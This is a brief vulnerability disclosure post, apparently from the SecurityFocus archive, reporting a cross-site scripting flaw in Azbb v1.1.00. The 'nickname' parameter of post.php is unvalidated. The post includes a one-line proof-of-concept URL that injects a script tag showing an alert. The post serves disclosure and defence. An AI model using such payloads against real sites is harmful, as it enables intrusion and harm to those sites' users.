[CORRECTIONS AND ADDITIONS ]Azbb v1.1.00 Cross-Site Scripting Jan 28 2006 07:30AM
roozbeh_afrasiabi yahoo com
PoC :

--------------------

1)

This flaw exists because the application does not validate the "nickname"

variable upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!-
-

--------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus